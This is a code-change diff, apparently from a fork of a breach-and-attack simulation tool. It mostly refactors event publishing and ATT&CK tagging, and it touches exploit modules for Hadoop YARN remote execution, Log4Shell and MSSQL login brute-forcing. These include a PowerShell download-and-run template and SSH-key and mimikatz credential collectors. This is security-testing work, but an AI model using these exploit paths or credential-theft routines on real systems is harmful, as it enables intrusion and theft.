确认合并

测试，，，，，，，，，，，，，，，，，，
ADD file via upload
2022-10-11 09:55:06 +08:00 · 2022-10-10 14:48:05 +08:00 · 2022-10-10 14:39:32 +08:00 · 2022-10-10 14:38:31 +08:00 · 2022-10-10 13:40:54 +08:00 · 2022-10-10 13:36:32 +08:00
59 changed files with 1572 additions and 817 deletions
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@ -115,6 +115,8 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 - "/api/island-configuration" endpoint. #2003
 - "-t/--tunnel" from agent command line arguments. #2216
 - "/api/monkey-control/neets-to-stop". #2261
+- "GET /api/test/monkey" endpoint. #2269
+- "GET /api/test/log" endpoint. #2269

 ### Fixed
 - A bug in network map page that caused delay of telemetry log loading. #1545
--- a/c/test_dumps.py
+++ b/c/test_dumps.py
@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)
--- a/envs/monkey_zoo/blackbox/analyzers/communication_analyzer.py
+++ b/envs/monkey_zoo/blackbox/analyzers/communication_analyzer.py
@ -1,4 +1,5 @@
-from typing import Iterable
+from ipaddress import IPv4Address
+from typing import Collection, Iterable

 from envs.monkey_zoo.blackbox.analyzers.analyzer import Analyzer
 from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog
@ -13,15 +14,22 @@ class CommunicationAnalyzer(Analyzer):

    def analyze_test_results(self):
        self.log.clear()
-        all_monkeys_communicated = True
-        for machine_ip in self.machine_ips:
-            if not self.did_monkey_communicate_back(machine_ip):
-                self.log.add_entry("Monkey from {} didn't communicate back".format(machine_ip))
-                all_monkeys_communicated = False
-            else:
-                self.log.add_entry("Monkey from {} communicated back".format(machine_ip))
-        return all_monkeys_communicated
+        all_agents_communicated = True
+        agent_ips = self._get_agent_ips()

-    def did_monkey_communicate_back(self, machine_ip: str):
-        query = {"ip_addresses": {"$elemMatch": {"$eq": machine_ip}}}
-        return len(self.island_client.find_monkeys_in_db(query)) > 0
+        for machine_ip in self.machine_ips:
+            if self._agent_communicated_back(machine_ip, agent_ips):
+                self.log.add_entry("Agent from {} communicated back".format(machine_ip))
+            else:
+                self.log.add_entry("Agent from {} didn't communicate back".format(machine_ip))
+                all_agents_communicated = False
+
+        return all_agents_communicated
+
+    def _get_agent_ips(self) -> Collection[IPv4Address]:
+        agents = self.island_client.get_agents()
+        machines = self.island_client.get_machines()
+        return {i.ip for a in agents for i in machines[a.machine_id].network_interfaces}
+
+    def _agent_communicated_back(self, machine_ip: str, agent_ips: Collection[IPv4Address]) -> bool:
+        return IPv4Address(machine_ip) in agent_ips
--- a/envs/monkey_zoo/blackbox/island_client/monkey_island_client.py
+++ b/envs/monkey_zoo/blackbox/island_client/monkey_island_client.py
@ -15,7 +15,6 @@ SLEEP_BETWEEN_REQUESTS_SECONDS = 0.5
 GET_AGENTS_ENDPOINT = "api/agents"
 GET_LOG_ENDPOINT = "api/agent-logs"
 GET_MACHINES_ENDPOINT = "api/machines"
-MONKEY_TEST_ENDPOINT = "api/test/monkey"
 TELEMETRY_TEST_ENDPOINT = "api/test/telemetry"
 LOGGER = logging.getLogger(__name__)

@ -139,14 +138,6 @@ class MonkeyIslandClient(object):
            LOGGER.error("Failed to reset island mode")
            assert False

-    def find_monkeys_in_db(self, query):
-        if query is None:
-            raise TypeError
-        response = self.requests.get(
-            MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query)
-        )
-        return MonkeyIslandClient.get_test_query_results(response)
-
    def find_telems_in_db(self, query: dict):
        if query is None:
            raise TypeError
@ -155,12 +146,6 @@ class MonkeyIslandClient(object):
        )
        return MonkeyIslandClient.get_test_query_results(response)

-    def get_all_monkeys_from_db(self):
-        response = self.requests.get(
-            MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(None)
-        )
-        return MonkeyIslandClient.get_test_query_results(response)
-
    def get_agents(self) -> Sequence[Agent]:
        response = self.requests.get(GET_AGENTS_ENDPOINT)

@ -186,5 +171,5 @@ class MonkeyIslandClient(object):
        return json.loads(response.content)["results"]

    def is_all_monkeys_dead(self):
-        query = {"dead": False}
-        return len(self.find_monkeys_in_db(query)) == 0
+        agents = self.get_agents()
+        return all((a.stop_time is not None for a in agents))
--- a/envs/os_compatibility/test_compatibility.py
+++ b/envs/os_compatibility/test_compatibility.py
@ -1,3 +1,6 @@
+from ipaddress import IPv4Address
+from typing import Collection
+
 import pytest

 from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
@ -40,18 +43,17 @@ def island_client(island):
@pytest.mark.usefixtures("island_client")
 # noinspection PyUnresolvedReferences
 class TestOSCompatibility(object):
-    def test_os_compat(self, island_client):
+    def test_os_compat(self, island_client: MonkeyIslandClient):
        print()
-        all_monkeys = island_client.get_all_monkeys_from_db()
-        ips_that_communicated = []
-        for monkey in all_monkeys:
-            for ip in monkey["ip_addresses"]:
-                if ip in machine_list:
-                    ips_that_communicated.append(ip)
-                    break
+        ips_that_communicated = self._get_agent_ips(island_client)
        for ip, os in machine_list.items():
-            if ip not in ips_that_communicated:
+            if IPv4Address(ip) not in ips_that_communicated:
                print("{} didn't communicate to island".format(os))

        if len(ips_that_communicated) < len(machine_list):
            assert False
+
+    def _get_agent_ips(self, island_client: MonkeyIslandClient) -> Collection[IPv4Address]:
+        agents = island_client.get_agents()
+        machines = island_client.get_machines()
+        return {i.ip for a in agents for i in machines[a.machine_id].network_interfaces}
--- a/monkey/common/agent_event_serializers/register.py
+++ b/monkey/common/agent_event_serializers/register.py
@ -1,4 +1,10 @@
-from common.agent_events import CredentialsStolenEvent, PingScanEvent, TCPScanEvent
+from common.agent_events import (
+    CredentialsStolenEvent,
+    ExploitationEvent,
+    PingScanEvent,
+    PropagationEvent,
+    TCPScanEvent,
+)

 from . import AgentEventSerializerRegistry, PydanticAgentEventSerializer

@ -11,3 +17,5 @@ def register_common_agent_event_serializers(
    )
    event_serializer_registry[PingScanEvent] = PydanticAgentEventSerializer(PingScanEvent)
    event_serializer_registry[TCPScanEvent] = PydanticAgentEventSerializer(TCPScanEvent)
+    event_serializer_registry[PropagationEvent] = PydanticAgentEventSerializer(PropagationEvent)
+    event_serializer_registry[ExploitationEvent] = PydanticAgentEventSerializer(ExploitationEvent)
--- a/monkey/common/base_models.py
+++ b/monkey/common/base_models.py
@ -10,6 +10,11 @@ class InfectionMonkeyModelConfig:
    extra = Extra.forbid


+class MutableInfectionMonkeyModelConfig(InfectionMonkeyModelConfig):
+    allow_mutation = True
+    validate_assignment = True
+
+
 class InfectionMonkeyBaseModel(BaseModel):
    class Config(InfectionMonkeyModelConfig):
        pass
@ -47,6 +52,5 @@ class InfectionMonkeyBaseModel(BaseModel):


 class MutableInfectionMonkeyBaseModel(InfectionMonkeyBaseModel):
-    class Config(InfectionMonkeyModelConfig):
-        allow_mutation = True
-        validate_assignment = True
+    class Config(MutableInfectionMonkeyModelConfig):
+        pass
--- a/monkey/common/tags/init.py
+++ b/monkey/common/tags/init.py
@ -0,0 +1,14 @@
+from .attack import (
+    T1003_ATTACK_TECHNIQUE_TAG,
+    T1005_ATTACK_TECHNIQUE_TAG,
+    T1021_ATTACK_TECHNIQUE_TAG,
+    T1059_ATTACK_TECHNIQUE_TAG,
+    T1098_ATTACK_TECHNIQUE_TAG,
+    T1105_ATTACK_TECHNIQUE_TAG,
+    T1110_ATTACK_TECHNIQUE_TAG,
+    T1145_ATTACK_TECHNIQUE_TAG,
+    T1203_ATTACK_TECHNIQUE_TAG,
+    T1210_ATTACK_TECHNIQUE_TAG,
+    T1222_ATTACK_TECHNIQUE_TAG,
+    T1570_ATTACK_TECHNIQUE_TAG,
+)
--- a/monkey/common/tags/attack.py
+++ b/monkey/common/tags/attack.py
@ -0,0 +1,12 @@
+T1003_ATTACK_TECHNIQUE_TAG = "attack-t1003"
+T1005_ATTACK_TECHNIQUE_TAG = "attack-t1005"
+T1021_ATTACK_TECHNIQUE_TAG = "attack-t1021"
+T1059_ATTACK_TECHNIQUE_TAG = "attack-t1059"
+T1098_ATTACK_TECHNIQUE_TAG = "attack-t1098"
+T1105_ATTACK_TECHNIQUE_TAG = "attack-t1105"
+T1110_ATTACK_TECHNIQUE_TAG = "attack-t1110"
+T1145_ATTACK_TECHNIQUE_TAG = "attack-t1145"
+T1203_ATTACK_TECHNIQUE_TAG = "attack-t1203"
+T1210_ATTACK_TECHNIQUE_TAG = "attack-t1210"
+T1222_ATTACK_TECHNIQUE_TAG = "attack-t1222"
+T1570_ATTACK_TECHNIQUE_TAG = "attack-t1570"
--- a/monkey/common/types.py
+++ b/monkey/common/types.py
@ -28,6 +28,17 @@ JSONSerializable = Union[  # type: ignore[misc]
 ]


+class NetworkService(Enum):
+    """
+    An Enum representing network services
+
+    This Enum represents all network services that Infection Monkey supports. The value of each
+    member is the member's name in all lower-case characters.
+    """
+
+    UNKNOWN = "unknown"
+
+
 class NetworkPort(ConstrainedInt):
    """
    Define network port as constrainer integer.
--- a/monkey/infection_monkey/agent_event_handlers/init.py
+++ b/monkey/infection_monkey/agent_event_handlers/init.py
@ -0,0 +1,5 @@
+from .notify_relay_on_propagation import notify_relay_on_propagation
+from .agent_event_forwarder import AgentEventForwarder
+from .add_stolen_credentials_to_repository import (
+    add_stolen_credentials_to_propagation_credentials_repository,
+)
--- a/monkey/infection_monkey/agent_event_handlers/add_stolen_credentials_to_repository.py
+++ b/monkey/infection_monkey/agent_event_handlers/add_stolen_credentials_to_repository.py
@ -1,13 +1,12 @@
 import logging

 from common.agent_events import CredentialsStolenEvent
-
-from . import IPropagationCredentialsRepository
+from infection_monkey.credential_repository import IPropagationCredentialsRepository

 logger = logging.getLogger(__name__)


-class add_credentials_from_event_to_propagation_credentials_repository:
+class add_stolen_credentials_to_propagation_credentials_repository:
    def __init__(self, credentials_repository: IPropagationCredentialsRepository):
        self._credentials_repository = credentials_repository

--- a/monkey/infection_monkey/agent_event_handlers/agent_event_forwarder.py
+++ b/monkey/infection_monkey/agent_event_handlers/agent_event_forwarder.py
--- a/monkey/infection_monkey/agent_event_handlers/notify_relay_on_propagation.py
+++ b/monkey/infection_monkey/agent_event_handlers/notify_relay_on_propagation.py
@ -0,0 +1,31 @@
+import logging
+from typing import Optional
+
+from common.agent_events import PropagationEvent
+from infection_monkey.network.relay import TCPRelay
+
+logger = logging.getLogger(__name__)
+
+
+class notify_relay_on_propagation:
+    """
+    Notifies a TCPRelay of potential relay users if propagation is successful
+    """
+
+    def __init__(self, tcp_relay: Optional[TCPRelay]):
+        """
+        :param tcp_relay: A TCPRelay to notify on successful propagation
+        """
+        self._tcp_relay = tcp_relay
+
+    def __call__(self, event: PropagationEvent):
+        """
+        Notify a TCPRelay of potential relay users if propagation is successful
+
+        :param event: A `PropagationEvent`
+        """
+        if self._tcp_relay is None:
+            return
+
+        if event.success:
+            self._tcp_relay.add_potential_user(event.target)
--- a/monkey/infection_monkey/credential_collectors/mimikatz_collector/mimikatz_credential_collector.py
+++ b/monkey/infection_monkey/credential_collectors/mimikatz_collector/mimikatz_credential_collector.py
@ -4,6 +4,7 @@ from typing import Sequence
 from common.agent_events import CredentialsStolenEvent
 from common.credentials import Credentials, LMHash, NTHash, Password, Username
 from common.event_queue import IAgentEventQueue
+from common.tags import T1003_ATTACK_TECHNIQUE_TAG, T1005_ATTACK_TECHNIQUE_TAG
 from infection_monkey.i_puppet import ICredentialCollector
 from infection_monkey.model import USERNAME_PREFIX
 from infection_monkey.utils.ids import get_agent_id
@ -15,8 +16,6 @@ logger = logging.getLogger(__name__)


 MIMIKATZ_CREDENTIAL_COLLECTOR_TAG = "mimikatz-credentials-collector"
-T1003_ATTACK_TECHNIQUE_TAG = "attack-t1003"
-T1005_ATTACK_TECHNIQUE_TAG = "attack-t1005"

 MIMIKATZ_EVENT_TAGS = frozenset(
    (
@ -28,8 +27,8 @@ MIMIKATZ_EVENT_TAGS = frozenset(


 class MimikatzCredentialCollector(ICredentialCollector):
-    def __init__(self, event_queue: IAgentEventQueue):
-        self._event_queue = event_queue
+    def __init__(self, agent_event_queue: IAgentEventQueue):
+        self._agent_event_queue = agent_event_queue

    def collect_credentials(self, options=None) -> Sequence[Credentials]:
        logger.info("Attempting to collect windows credentials with pypykatz.")
@ -82,4 +81,4 @@ class MimikatzCredentialCollector(ICredentialCollector):
            stolen_credentials=collected_credentials,
        )

-        self._event_queue.publish(credentials_stolen_event)
+        self._agent_event_queue.publish(credentials_stolen_event)
--- a/monkey/infection_monkey/credential_collectors/ssh_collector/ssh_credential_collector.py
+++ b/monkey/infection_monkey/credential_collectors/ssh_collector/ssh_credential_collector.py
@ -15,13 +15,15 @@ class SSHCredentialCollector(ICredentialCollector):
    SSH keys credential collector
    """

-    def __init__(self, telemetry_messenger: ITelemetryMessenger, event_queue: IAgentEventQueue):
+    def __init__(
+        self, telemetry_messenger: ITelemetryMessenger, agent_event_queue: IAgentEventQueue
+    ):
        self._telemetry_messenger = telemetry_messenger
-        self._event_queue = event_queue
+        self._agent_event_queue = agent_event_queue

    def collect_credentials(self, _options=None) -> Sequence[Credentials]:
        logger.info("Started scanning for SSH credentials")
-        ssh_info = ssh_handler.get_ssh_info(self._telemetry_messenger, self._event_queue)
+        ssh_info = ssh_handler.get_ssh_info(self._telemetry_messenger, self._agent_event_queue)
        logger.info("Finished scanning for SSH credentials")

        return ssh_handler.to_credentials(ssh_info)
--- a/monkey/infection_monkey/credential_collectors/ssh_collector/ssh_handler.py
+++ b/monkey/infection_monkey/credential_collectors/ssh_collector/ssh_handler.py
@ -6,6 +6,11 @@ from typing import Dict, Iterable, Sequence
 from common.agent_events import CredentialsStolenEvent
 from common.credentials import Credentials, SSHKeypair, Username
 from common.event_queue import IAgentEventQueue
+from common.tags import (
+    T1003_ATTACK_TECHNIQUE_TAG,
+    T1005_ATTACK_TECHNIQUE_TAG,
+    T1145_ATTACK_TECHNIQUE_TAG,
+)
 from common.utils.attack_utils import ScanStatus
 from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
 from infection_monkey.telemetry.attack.t1145_telem import T1145Telem
@ -17,9 +22,6 @@ logger = logging.getLogger(__name__)

 DEFAULT_DIRS = ["/.ssh/", "/"]
 SSH_CREDENTIAL_COLLECTOR_TAG = "ssh-credentials-collector"
-T1003_ATTACK_TECHNIQUE_TAG = "attack-t1003"
-T1005_ATTACK_TECHNIQUE_TAG = "attack-t1005"
-T1145_ATTACK_TECHNIQUE_TAG = "attack-t1145"

 SSH_COLLECTOR_EVENT_TAGS = frozenset(
    (
@ -32,7 +34,7 @@ SSH_COLLECTOR_EVENT_TAGS = frozenset(


 def get_ssh_info(
-    telemetry_messenger: ITelemetryMessenger, event_queue: IAgentEventQueue
+    telemetry_messenger: ITelemetryMessenger, agent_event_queue: IAgentEventQueue
 ) -> Iterable[Dict]:
    # TODO: Remove this check when this is turned into a plugin.
    if is_windows_os():
@ -42,7 +44,7 @@ def get_ssh_info(
        return []

    home_dirs = _get_home_dirs()
-    ssh_info = _get_ssh_files(home_dirs, telemetry_messenger, event_queue)
+    ssh_info = _get_ssh_files(home_dirs, telemetry_messenger, agent_event_queue)

    return ssh_info

@ -83,7 +85,7 @@ def _get_ssh_struct(name: str, home_dir: str) -> Dict:
 def _get_ssh_files(
    user_info: Iterable[Dict],
    telemetry_messenger: ITelemetryMessenger,
-    event_queue: IAgentEventQueue,
+    agent_event_queue: IAgentEventQueue,
 ) -> Iterable[Dict]:
    for info in user_info:
        path = info["home_dir"]
@ -125,7 +127,7 @@ def _get_ssh_files(

                                            collected_credentials = to_credentials([info])
                                            _publish_credentials_stolen_event(
-                                                collected_credentials, event_queue
+                                                collected_credentials, agent_event_queue
                                            )
                                        else:
                                            continue
@ -170,7 +172,7 @@ def to_credentials(ssh_info: Iterable[Dict]) -> Sequence[Credentials]:


 def _publish_credentials_stolen_event(
-    collected_credentials: Credentials, event_queue: IAgentEventQueue
+    collected_credentials: Sequence[Credentials], agent_event_queue: IAgentEventQueue
 ):
    credentials_stolen_event = CredentialsStolenEvent(
        source=get_agent_id(),
@ -178,4 +180,4 @@ def _publish_credentials_stolen_event(
        stolen_credentials=collected_credentials,
    )

-    event_queue.publish(credentials_stolen_event)
+    agent_event_queue.publish(credentials_stolen_event)
--- a/monkey/infection_monkey/credential_repository/init.py
+++ b/monkey/infection_monkey/credential_repository/init.py
@ -2,6 +2,3 @@ from .i_propagation_credentials_repository import IPropagationCredentialsReposit
 from .aggregating_propagation_credentials_repository import (
    AggregatingPropagationCredentialsRepository,
 )
-from .add_credentials_from_event import (
-    add_credentials_from_event_to_propagation_credentials_repository,
-)
--- a/monkey/infection_monkey/exploit/HostExploiter.py
+++ b/monkey/infection_monkey/exploit/HostExploiter.py
@ -2,13 +2,17 @@ import logging
 import threading
 from abc import abstractmethod
 from datetime import datetime
-from typing import Dict, Sequence
+from ipaddress import IPv4Address
+from time import time
+from typing import Dict, Sequence, Tuple

+from common.agent_events import ExploitationEvent, PropagationEvent
 from common.event_queue import IAgentEventQueue
 from common.utils.exceptions import FailedExploitationError
 from infection_monkey.i_puppet import ExploiterResultData
 from infection_monkey.model import VictimHost
 from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
+from infection_monkey.utils.ids import get_agent_id

 from . import IAgentBinaryRepository

@ -21,6 +25,16 @@ class HostExploiter:
    def _EXPLOITED_SERVICE(self):
        pass

+    @property
+    @abstractmethod
+    def _EXPLOITER_TAGS(self) -> Tuple[str, ...]:
+        pass
+
+    @property
+    @abstractmethod
+    def _PROPAGATION_TAGS(self) -> Tuple[str, ...]:
+        pass
+
    def __init__(self):
        self.exploit_info = {
            "display_name": self._EXPLOITED_SERVICE,
@ -33,7 +47,7 @@ class HostExploiter:
        self.exploit_attempts = []
        self.host = None
        self.telemetry_messenger = None
-        self.event_queue = None
+        self.agent_event_queue = None
        self.options = {}
        self.exploit_result = {}
        self.servers = []
@ -62,7 +76,7 @@ class HostExploiter:
        servers: Sequence[str],
        current_depth: int,
        telemetry_messenger: ITelemetryMessenger,
-        event_queue: IAgentEventQueue,
+        agent_event_queue: IAgentEventQueue,
        agent_binary_repository: IAgentBinaryRepository,
        options: Dict,
        interrupt: threading.Event,
@ -71,7 +85,7 @@ class HostExploiter:
        self.servers = servers
        self.current_depth = current_depth
        self.telemetry_messenger = telemetry_messenger
-        self.event_queue = event_queue
+        self.agent_event_queue = agent_event_queue
        self.agent_binary_repository = agent_binary_repository
        self.options = options
        self.interrupt = interrupt
@ -124,3 +138,39 @@ class HostExploiter:
        """
        powershell = True if "powershell" in cmd.lower() else False
        self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell})
+
+    def _publish_exploitation_event(
+        self,
+        time: float = time(),
+        success: bool = False,
+        tags: Tuple[str, ...] = tuple(),
+        error_message: str = "",
+    ):
+        exploitation_event = ExploitationEvent(
+            source=get_agent_id(),
+            target=IPv4Address(self.host.ip_addr),
+            success=success,
+            exploiter_name=self.__class__.__name__,
+            error_message=error_message,
+            timestamp=time,
+            tags=frozenset(tags or self._EXPLOITER_TAGS),
+        )
+        self.agent_event_queue.publish(exploitation_event)
+
+    def _publish_propagation_event(
+        self,
+        time: float = time(),
+        success: bool = False,
+        tags: Tuple[str, ...] = tuple(),
+        error_message: str = "",
+    ):
+        propagation_event = PropagationEvent(
+            source=get_agent_id(),
+            target=IPv4Address(self.host.ip_addr),
+            success=success,
+            exploiter_name=self.__class__.__name__,
+            error_message=error_message,
+            timestamp=time,
+            tags=frozenset(tags or self._PROPAGATION_TAGS),
+        )
+        self.agent_event_queue.publish(propagation_event)
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@ -5,13 +5,20 @@
 """

 import json
+import logging
 import posixpath
 import random
 import string
+from time import time

 import requests

 from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
+from common.tags import (
+    T1105_ATTACK_TECHNIQUE_TAG,
+    T1203_ATTACK_TECHNIQUE_TAG,
+    T1210_ATTACK_TECHNIQUE_TAG,
+)
 from infection_monkey.exploit.tools.helpers import get_agent_dst_path
 from infection_monkey.exploit.tools.http_tools import HTTPTools
 from infection_monkey.exploit.web_rce import WebRCE
@ -23,6 +30,10 @@ from infection_monkey.model import (
 )
 from infection_monkey.utils.commands import build_monkey_commandline

+logger = logging.getLogger(__name__)
+
+HADOOP_EXPLOITER_TAG = "hadoop-exploiter"
+

 class HadoopExploiter(WebRCE):
    _EXPLOITED_SERVICE = "Hadoop"
@ -32,39 +43,43 @@ class HadoopExploiter(WebRCE):
    # Random string's length that's used for creating unique app name
    RAN_STR_LEN = 6

+    _EXPLOITER_TAGS = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
+
+    _PROPAGATION_TAGS = (HADOOP_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG)
+
    def __init__(self):
        super(HadoopExploiter, self).__init__()

    def _exploit_host(self):
-        # Try to get exploitable url
-        urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
-        self.add_vulnerable_urls(urls, True)
-        if not self.vulnerable_urls:
+        # Try to get potential urls
+        potential_urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
+        if not potential_urls:
+            self.exploit_result.error_message = (
+                f"No potential exploitable urls has been found for {self.host}"
+            )
            return self.exploit_result

-        try:
-            monkey_path_on_victim = get_agent_dst_path(self.host)
-        except KeyError:
-            return self.exploit_result
+        monkey_path_on_victim = get_agent_dst_path(self.host)

        http_path, http_thread = HTTPTools.create_locked_transfer(
            self.host, str(monkey_path_on_victim), self.agent_binary_repository
        )

+        command = self._build_command(monkey_path_on_victim, http_path)
        try:
-            command = self._build_command(monkey_path_on_victim, http_path)
-
-            if self.exploit(self.vulnerable_urls[0], command):
-                self.add_executed_cmd(command)
-                self.exploit_result.exploitation_success = True
-                self.exploit_result.propagation_success = True
+            for url in potential_urls:
+                if self.exploit(url, command):
+                    self.add_executed_cmd(command)
+                    self.exploit_result.exploitation_success = True
+                    self.exploit_result.propagation_success = True
+                    break
        finally:
            http_thread.join(self.DOWNLOAD_TIMEOUT)
            http_thread.stop()

        return self.exploit_result

-    def exploit(self, url, command):
+    def exploit(self, url: str, command: str):
        if self._is_interrupted():
            self._set_interrupted()
            return False
@ -73,8 +88,8 @@ class HadoopExploiter(WebRCE):
        resp = requests.post(
            posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
        )
-        resp = json.loads(resp.content)
-        app_id = resp["application-id"]
+        resp_dict = json.loads(resp.content)
+        app_id = resp_dict["application-id"]

        # Create a random name for our application in YARN
        # random.SystemRandom can block indefinitely in Linux
@ -87,10 +102,16 @@ class HadoopExploiter(WebRCE):
            self._set_interrupted()
            return False

+        timestamp = time()
        resp = requests.post(
            posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
        )
-        return resp.status_code == 202
+
+        success = resp.status_code == 202
+        message = "" if success else f"Failed to exploit via {url}"
+        self._publish_exploitation_event(timestamp, success, error_message=message)
+        self._publish_propagation_event(timestamp, success, error_message=message)
+        return success

    def check_if_exploitable(self, url):
        try:
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@ -4,6 +4,11 @@ from pathlib import PurePath

 from common import OperatingSystem
 from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
+from common.tags import (
+    T1105_ATTACK_TECHNIQUE_TAG,
+    T1110_ATTACK_TECHNIQUE_TAG,
+    T1203_ATTACK_TECHNIQUE_TAG,
+)
 from common.utils import Timer
 from infection_monkey.exploit.log4shell_utils import (
    LINUX_EXPLOIT_TEMPLATE_PATH,
@ -26,12 +31,26 @@ from infection_monkey.utils.threading import interruptible_iter

 logger = logging.getLogger(__name__)

+LOG4SHELL_EXPLOITER_TAG = "log4shell-exploiter"
+VICTIM_WAIT_SLEEP_TIME_SEC = 0.050
+

 class Log4ShellExploiter(WebRCE):
    _EXPLOITED_SERVICE = "Log4j"
    SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT
    REQUEST_TO_VICTIM_TIMEOUT = MEDIUM_REQUEST_TIMEOUT

+    _EXPLOITER_TAGS = (
+        LOG4SHELL_EXPLOITER_TAG,
+        T1110_ATTACK_TECHNIQUE_TAG,
+        T1203_ATTACK_TECHNIQUE_TAG,
+    )
+    _PROPAGATION_TAGS = (
+        LOG4SHELL_EXPLOITER_TAG,
+        T1203_ATTACK_TECHNIQUE_TAG,
+        T1105_ATTACK_TECHNIQUE_TAG,
+    )
+
    def _exploit_host(self) -> ExploiterResultData:
        self._open_ports = [
            int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
@ -146,24 +165,37 @@ class Log4ShellExploiter(WebRCE):
                    f"on port {port}"
                )
                try:
+                    timestamp = time.time()
                    url = exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
-                except Exception as ex:
-                    logger.warning(
+                except Exception as err:
+                    error_message = (
                        "An error occurred while attempting to exploit log4shell on a "
-                        f"potential {exploit.service_name} service: {ex}"
+                        f"potential {exploit.service_name} service: {err}"
                    )

-                if self._wait_for_victim():
+                    logger.warning(error_message)
+                    self._publish_exploitation_event(timestamp, False, error_message=error_message)
+
+                # TODO: _wait_for_victim() gets called even if trigger_exploit() raises an
+                #       exception. Is that the desired behavior?
+                if self._wait_for_victim(timestamp):
                    self.exploit_info["vulnerable_service"] = {
                        "service_name": exploit.service_name,
                        "port": port,
                    }
                    self.exploit_info["vulnerable_urls"].append(url)

-    def _wait_for_victim(self) -> bool:
+    def _wait_for_victim(self, timestamp: float) -> bool:
        victim_called_back = self._wait_for_victim_to_download_java_bytecode()
        if victim_called_back:
-            self._wait_for_victim_to_download_agent()
+            self._publish_exploitation_event(timestamp, True)
+
+            victim_downloaded_agent = self._wait_for_victim_to_download_agent()
+            self._publish_propagation_event(success=victim_downloaded_agent)
+        else:
+            error_message = "Timed out while waiting for victim to download the java bytecode"
+            logger.debug(error_message)
+            self._publish_exploitation_event(timestamp, False, error_message=error_message)

        return victim_called_back

@ -176,19 +208,20 @@ class Log4ShellExploiter(WebRCE):
                self.exploit_result.exploitation_success = True
                return True

-            time.sleep(1)
+            time.sleep(VICTIM_WAIT_SLEEP_TIME_SEC)

-        logger.debug("Timed out while waiting for victim to download the java bytecode")
        return False

-    def _wait_for_victim_to_download_agent(self):
+    def _wait_for_victim_to_download_agent(self) -> bool:
        timer = Timer()
        timer.set(LONG_REQUEST_TIMEOUT)

        while not timer.is_expired():
            if self._agent_http_server_thread.downloads > 0:
                self.exploit_result.propagation_success = True
-                break
+                return True

            # TODO: if the http server got an error we're waiting for nothing here
-            time.sleep(1)
+            time.sleep(VICTIM_WAIT_SLEEP_TIME_SEC)
+
+        return False
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@ -1,12 +1,18 @@
 import logging
 from pathlib import PureWindowsPath
-from time import sleep
-from typing import Sequence, Tuple
+from time import sleep, time
+from typing import Iterable, Optional, Tuple

 import pymssql

 from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
 from common.credentials import get_plaintext
+from common.tags import (
+    T1059_ATTACK_TECHNIQUE_TAG,
+    T1105_ATTACK_TECHNIQUE_TAG,
+    T1110_ATTACK_TECHNIQUE_TAG,
+    T1210_ATTACK_TECHNIQUE_TAG,
+)
 from common.utils.exceptions import FailedExploitationError
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_agent_dst_path
@ -20,6 +26,8 @@ from infection_monkey.utils.threading import interruptible_iter

 logger = logging.getLogger(__name__)

+MSSQL_EXPLOITER_TAG = "mssql-exploiter"
+

 class MSSQLExploiter(HostExploiter):
    _EXPLOITED_SERVICE = "MSSQL"
@ -36,13 +44,20 @@ class MSSQLExploiter(HostExploiter):
        "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
    )

+    _EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
+    _PROPAGATION_TAGS = (
+        MSSQL_EXPLOITER_TAG,
+        T1059_ATTACK_TECHNIQUE_TAG,
+        T1105_ATTACK_TECHNIQUE_TAG,
+    )
+
    def __init__(self):
        super().__init__()
        self.cursor = None
        self.agent_http_path = None

    def _exploit_host(self) -> ExploiterResultData:
-        agent_path_on_victim = get_agent_dst_path(self.host)
+        agent_path_on_victim = PureWindowsPath(get_agent_dst_path(self.host))

        # Brute force to get connection
        creds = generate_identity_secret_pairs(
@ -52,16 +67,18 @@ class MSSQLExploiter(HostExploiter):
        try:
            self.cursor = self._brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds)
        except FailedExploitationError:
-            logger.info(
+            error_message = (
                f"Failed brute-forcing of MSSQL server on {self.host},"
                f" no credentials were successful"
            )
+            logger.error(error_message)
            return self.exploit_result

        if self._is_interrupted():
            self._set_interrupted()
            return self.exploit_result

+        timestamp = time()
        try:
            self._upload_agent(agent_path_on_victim)
            self._run_agent(agent_path_on_victim)
